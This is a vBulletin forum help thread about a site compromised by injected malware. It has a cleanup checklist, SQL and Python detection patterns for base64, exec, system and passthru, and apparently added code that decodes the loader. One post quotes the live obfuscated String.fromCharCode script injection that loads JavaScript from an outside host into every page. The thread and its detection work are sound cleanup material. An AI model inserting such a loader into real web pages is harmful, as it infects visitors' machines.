I have a malware!

  • Snakefrancesco
    Member
    • May 2010
    • 59

    [Forum] I have a malware!

    For two days, my website has been affected by malware (directmarketingprompt.in). My hosting (Aruba.it) says it's a script problem of vBulletin.
    I have installed the latest security patch but the problem persists.

    Please help me.
  • TheNewOne
    Senior Member
    • Aug 2011
    • 1033
    • 4.2.5

    #2
    It is not a vB problem.

    Comment

    • Snakefrancesco
      Member
      • May 2010
      • 59

      #3
      So what's my problem? Please, give me a solution.

      Comment

      • Loco.M
        Senior Member
        • Mar 2005
        • 4319
        • 3.5.x

        #4
        What exactly is happening, what is the URL to your forum?
        -- Web Developer for hire
        ---Online Marketing Tools and Articles

        Comment

        • Snakefrancesco
          Member
          • May 2010
          • 59

          #5
          Website dedicated to reviews, news and in-depth articles on retrogaming and the history of video games


          If you enter with Google Chrome, an alert message appears.

          Comment

          • Loco.M
            Senior Member
            • Mar 2005
            • 4319
            • 3.5.x

            #6
            Originally posted by Snakefrancesco
            www.retrogaminghistory.com

            If you enter with Google Chrome, an alert message appears.
            I can look when I go home for lunch. It looks like this site is blocked at my work.
            Maybe a screenshot of the alert would help as well?

            Comment

            • Snakefrancesco
              Member
              • May 2010
              • 59

              #7
              This malware seems to be present only in the CMS; in the forum and blog you will not get the alert message.

              how can I remove this malware?

              Comment

              • DAMINK
                Senior Member
                • Jun 2010
                • 330
                • 4.0.0

                #8
                Originally posted by TheNewOne
                It is not a vB problem.
                LOL! I often wonder why people even offer to reply if their replies are like that.

                Here is a screenshot of the detections I got when visiting your site.



                Had anything changed on your site in recent days apart from the upgrade?
                Added mods or anything like that?
                FTW Forum <- Home of the damned!

                Comment

                • snerd
                  Member
                  • Apr 2006
                  • 91
                  • 3.8.x

                  #9
                  If you're running it, it's a vBSEO script injection vulnerability. Patch available on their site.
                  snerd

                  Comment

                  • Trevor Hannant
                    vBulletin Support
                    • Aug 2002
                    • 24358
                    • 5.7.X

                    #10
                    Originally posted by TheNewOne
                    It is not a vB problem.
                    Very helpful...

                    Originally posted by Snakefrancesco
                    For two days, my website has been affected by malware (directmarketingprompt.in). My hosting (Aruba.it) says it's a script problem of vBulletin.
                    I have installed the latest security patch but the problem persists.

                    Please help me.
                    To check a site for compromises follow these steps:

                    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

                    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

                    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

                    The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
                    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%'; -- PHP spells the function passthru(), so the pattern must not contain an underscore

                    If you have a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

                    7) Using phpMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%'; -- PHP spells the function passthru(), so the pattern must not contain an underscore

                    It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

                    8) Check .htaccess to make sure there are no redirects there.

                    9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
                    Vote for:

                    - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                    - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

                    Comment
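The checklist above is meant to be worked through by eye in phpMyAdmin. As an added example (not code from the thread or from vBulletin), the script below re-implements steps 3 and 5-7 over rows exported from the `plugin` and `template` tables, so the same review can be run offline against a dump. It goes a little beyond the thread's five LIKE patterns: it accepts both the `passthru` and `pass_thru` spellings, and it also flags `String.fromCharCode`, which the injection quoted later in this thread uses to hide its script URL and which none of the original patterns would catch. The core product ids, the sample rows and the base64 blob are constructed assumptions; compare the ids with your own `product` table.

```python
import re

# Step 3: templates in which an <iframe> is expected; any other template that
# carries one is flagged.
IFRAME_ALLOWED_TEMPLATES = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# Note after step 6: an unreadable plugin attached to a stock product should be
# deleted, not reviewed. These product ids are an assumption; check your `product` table.
CORE_PRODUCTS = {"vbulletin", "vbcms", "vbblog", "skimlinks"}

# Steps 5-7, tightened from the thread's LIKE '%...%' patterns. PHP spells the
# function passthru(); the regex also accepts the pass_thru spelling used in the
# thread. fromCharCode is an addition: the injection quoted later in the thread
# builds its script URL that way and would slip past the five original patterns.
SUSPICIOUS = [
    ("base64", re.compile(r"base64", re.I)),
    ("exec", re.compile(r"\b(?:shell_)?exec\s*\(", re.I)),
    ("system", re.compile(r"\bsystem\s*\(", re.I)),
    ("passthru", re.compile(r"\bpass_?thru\s*\(", re.I)),
    ("iframe", re.compile(r"<\s*iframe\b", re.I)),
    ("fromCharCode", re.compile(r"String\.fromCharCode\s*\(")),
]


def _hits(code):
    """Names of the patterns that match the given PHP or template text."""
    return [name for name, rx in SUSPICIOUS if rx.search(code)]


def scan_plugins(rows):
    """rows: dicts with the columns of the thread's plugin query
    (title, phpcode, hookname, product). Returns the rows worth a second look."""
    findings = []
    for row in rows:
        hits = _hits(row["phpcode"])
        if hits:
            findings.append({
                "title": row["title"],
                "hookname": row["hookname"],
                "product": row["product"],
                "hits": hits,
                # stock product + suspicious code: delete rather than review
                "core_product": row["product"].lower() in CORE_PRODUCTS,
            })
    return findings


def scan_templates(rows):
    """rows: dicts with styleid, title, template (the columns of step 7's query)."""
    findings = []
    for row in rows:
        hits = _hits(row["template"])
        if "iframe" in hits and row["title"] in IFRAME_ALLOWED_TEMPLATES:
            hits.remove("iframe")  # step 3: an iframe is legitimate in this template
        if hits:
            findings.append({"styleid": row["styleid"], "title": row["title"], "hits": hits})
    return findings


# Constructed sample rows; titles, hook names and the base64 blob are made up.
SAMPLE_PLUGINS = [
    {"title": "Forum Runner init", "hookname": "global_start", "product": "forumrunner",
     "phpcode": "$vbulletin->options['fr_enabled'] = true;"},
    {"title": "Cache Manager", "hookname": "global_start", "product": "vbulletin",
     "phpcode": "eval(base64_decode('Y29uc3RydWN0ZWQgc2FtcGxl'));"},
    {"title": "Debug hook", "hookname": "init_startup", "product": "vbulletin",
     "phpcode": "passthru($payload);"},
]
SAMPLE_TEMPLATES = [
    {"styleid": 1, "title": "bbcode_video",
     "template": '<iframe src="{vb:raw url}" frameborder="0"></iframe>'},
    {"styleid": 1, "title": "headinclude",
     "template": '<script>var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));</script>'},
    {"styleid": 2, "title": "footer",
     "template": '<iframe src="http://example.invalid/x" width="0" height="0"></iframe>'},
]

if __name__ == "__main__":
    for f in scan_plugins(SAMPLE_PLUGINS):
        print("plugin:", f)
    for f in scan_templates(SAMPLE_TEMPLATES):
        print("template:", f)
```

Run against a real export, `bbcode_video` drops out because its iframe is expected, while a hidden iframe in `footer` and a fromCharCode loader in `headinclude` are reported; a plugin on a stock product with `base64_decode` or `passthru` comes back with `core_product` set, which is the thread's "delete it" case. The patterns are deliberately broad, so every hit still needs a human to read the code, exactly as step 7 says.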

                    • Snakefrancesco
                      Member
                      • May 2010
                      • 59

                      #11
                      Grazie! Thank you for helping me; it seems the malware has been deleted forever.

                      Comment

                      • Snakefrancesco
                        Member
                        • May 2010
                        • 59

                        #12
                        HEEELLLPPP!!! This is a nightmare! The malware is still on the site, I do not know what to do anymore...

                        I changed the server password, ran Suspect File Diagnostics, deleted suspicious files...

                        Please help me

                        Comment

                        • Alfa1
                          Senior Member
                          • Dec 2005
                          • 4165
                          • 3.8.x

                          #13
                          If you have installed vbSEO then apply the patch available from them. Read the thread on these topics @vbseo.com:


                          Check if the plugins that are listed in the vbseo.com thread have been added to your system.

                          If you have installed vbadvanced, upgrade to the latest version.


                          Remove all instances of this from your database:
                          <script type="text/javascript">
                          <!--
                          // Main vBulletin Javascript Initialization
                          var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,103,97,117,115,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
                          //-->
                          </script>
                          Change all passwords and secure your non-public directories. Scan your computers for infection.

                          Update all addons and vbulletin to the latest version.
                          I buy 420 forums

                          Comment
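The snippet Alfa1 quotes hides the loader's script URL behind `String.fromCharCode` so that a plain search for a domain name finds nothing. As an added example (not from the thread or from vBulletin), the script below decodes every `fromCharCode` call in a template or plugin row and rewrites the snippet with plain string literals, so an admin can see which host the injection loads from before removing it. The sample input is the snippet from the post above, embedded here; the function names are this example's own.

```python
import re

# Each String.fromCharCode(...) call; the number list may contain whitespace or
# line breaks when copied out of a database row, so those are tolerated.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*?)\s*\)")


def _codes(group):
    """Turn '115,99,114' (possibly wrapped across lines) into a list of ints."""
    cleaned = re.sub(r"\s+", "", group)
    return [int(c) for c in cleaned.split(",") if c]


def decode_charcode_calls(js):
    """Return the string each fromCharCode call evaluates to, in order."""
    return ["".join(chr(c) for c in _codes(m.group(1))) for m in FROMCHARCODE.finditer(js)]


def deobfuscate(js):
    """Replace every fromCharCode call with the string literal it builds."""
    def repl(m):
        return '"' + "".join(chr(c) for c in _codes(m.group(1))) + '"'
    return FROMCHARCODE.sub(repl, js)


def injected_script_sources(js):
    """URLs assigned to a .src property once the obfuscation is undone."""
    return re.findall(r'\.src\s*=\s*"([^"]+)"', deobfuscate(js))


# The injection quoted in the thread, embedded as sample input.
SAMPLE_INJECTION = """<script type="text/javascript">
<!--
// Main vBulletin Javascript Initialization
var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,103,97,117,115,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
//-->
</script>"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_INJECTION))
    print("loads from:", injected_script_sources(SAMPLE_INJECTION))
```

On the quoted snippet the three calls decode to `script`, the loader URL and `head`: the code creates a script element, points it at an external `jquery.compatibility.js` on a third-party host, and appends it to the page head before calling the real `vBulletin_init()`, which is why the forum keeps working while every visitor fetches the attacker's file. The decoded host is what to search for when checking that every copy has been removed, and what to compare against the intermediary domains listed in the Google diagnostic further down.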

                          • DAMINK
                            Senior Member
                            • Jun 2010
                            • 330
                            • 4.0.0

                            #14
                            Originally posted by Snakefrancesco
                            HEEELLLPPP!!! This is a nightmare! The malware is still on the site, I do not know what to do anymore...

                            I changed the server password, ran Suspect File Diagnostics, deleted suspicious files...

                            Please help me
                            I would do all of what Trevor suggested and also what Alfa suggested.
                            It appears you were able to get rid of it temporarily, so it's quite possible you have some outdated mod or other vulnerability we don't have.
                            That's why it came back. I see your site is now listed as below.

                            This web page at www.retrogaminghistory.com has been reported as an attack page and has been blocked based on your security preferences.

                            Perhaps you should disable all mods and start there?

                            Of the 23 pages we tested on the site over the past 90 days, 10 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-03-31, and the last time suspicious content was found on this site was on 2012-03-31. Malicious software includes 3 trojan(s), 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
                            Malicious software is hosted on 8 domain(s), including strongirmaster.byinter.net/, directmarketinglinearsale.in/, local15promo.in/.
                            8 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including js-hosting.in/, directmarketing22forwardsale.in/, directmarketinglead-trade.in/.
                            This site was hosted on 2 network(s) including AS31034 (ARUBA), AS15169 (Google Internet Backbone).

                            Comment

                            • aussiefooty
                              Senior Member
                              • Nov 2008
                              • 1904
                              • 6.0.X

                              #15
                              I have a malware!

                              Make sure you have got a good quality anti virus software installed on your pc. It will prevent viruses and malware from hitting your computer.
                              Aussiefootyforums

                              New Site New forum
                              Come and talk sports all day long


                              Comment
